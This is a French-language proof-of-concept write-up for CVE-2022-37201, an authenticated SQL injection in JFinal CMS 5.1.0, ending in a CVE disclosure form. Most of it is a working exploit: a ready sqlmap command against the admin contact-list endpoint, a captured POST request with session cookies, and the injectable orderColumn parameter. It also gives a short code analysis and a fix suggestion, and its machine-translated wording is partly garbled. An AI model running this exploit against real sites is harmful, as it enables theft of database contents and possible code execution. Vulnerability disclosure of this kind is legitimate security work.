
CVE-2022-37201 POC
CVE-2022-37201 POC
Tout d'abord, vous devez installer sqlmap
vous devez définir
puis exécutez le shell
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list --thread 8 --batch --smart --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10" --cookie " your cookie " --current-db
image-20220730053527316
Parfois, vous devez savoir que le /jfinal_cms/ n'est pas nécessaire, vous devez décider de la route
vous pouvez voir le code de l'interface /system/menu/list
sql.append(" order by ").append(orderBy);
Il y a une instruction SQL directement concaténée
de plus
Il n'y a aucune mesure pour empêcher l'injection SQL car l'injection SQL est requise ici
En analysant ce point de fonction, j'ai découvert que l'injection de orderby est fixe, comme id, name, menu key, donc vous pouvez essayer d'utiliser une requête paramétrée ou de faire une liste blanche
mon test
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
Exécutez-le dans sqlmap!!! utilisez -r
[Description suggérée] JFinal CMS 5.1.0 est vulnérable à l'injection SQL.
[Informations supplémentaires] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[Type de vulnérabilité] Injection SQL
[Vendeur du produit] le groupe de développement
[Code base du produit affecté] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0
[Composant affecté] Ces interfaces n'utilisent pas le même composant, ni n'ont de filtres, mais chacune utilise sa propre méthode de concaténation SQL, entraînant une injection SQL.
[Type d'attaque] À distance
[Impact exécution de code] true
[Impact divulgation d'informations] true
[Vecteurs d'attaque] La connexion utilisateur est requise
[Référence] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[Découvreur] jw5t